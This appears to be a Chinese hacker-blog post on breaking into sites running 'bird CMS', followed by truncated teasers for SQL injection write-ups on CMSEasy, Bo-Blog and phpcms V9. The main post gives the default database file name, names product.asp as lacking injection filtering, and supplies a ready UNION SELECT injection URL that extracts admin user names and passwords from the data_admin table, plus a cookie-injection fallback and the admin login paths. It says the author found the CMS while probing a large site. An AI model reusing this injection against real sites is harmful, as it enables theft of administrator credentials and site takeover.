from h4ckx7s blog
在旁註乙個大站的時候,在某個站的後台看見是什麼bird cms管理系統,記得1.1爆了什麼萬能密碼的漏洞!不知道最新版本的有什麼洞子沒有!大致的下了套原始碼看了看,**管理和程式設計師都懶了!
//預設資料庫 datadata#bird$.mdb
//漏洞檔案 product.asp 貌似都沒有任何防注入的,張開雙腿等人日啊!
//表段data_admin
構造語句:
product.asp?id=-30%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20from%20data_admin
欄位為name和pwd 如果防注入了就cookies注射一下!
後台admin 或 bird
Cmseasy SQL注射漏洞 2
注入.無限制 if preg match post username preg match get username preg match cookie login username 先看註冊 user act.php 289 行 function register action if config...
Bo Blog 2 0 3 注射漏洞
by flyh4t 上次硬碟壞了丟了很多資料 今天某兄弟生日 掏空我的記憶回想起來乙個很老的漏洞 inc mod tag.php if defined validrequest die access denied.if job job default else job basename job it...
phpcmsV9某sql注射漏洞及修復
別人說最危險的地方最安全,我說最安全的地方最危險。相信你們也沒有想到這個最常見,常常會在各種教程出現的地方會存在sql注射。需 gpc off 首先,我們看登陸的地方。最常見了吧。預設安裝情況下,會使有 v9自帶的使用者中心。synloginstr 同步登陸js if pc base load co...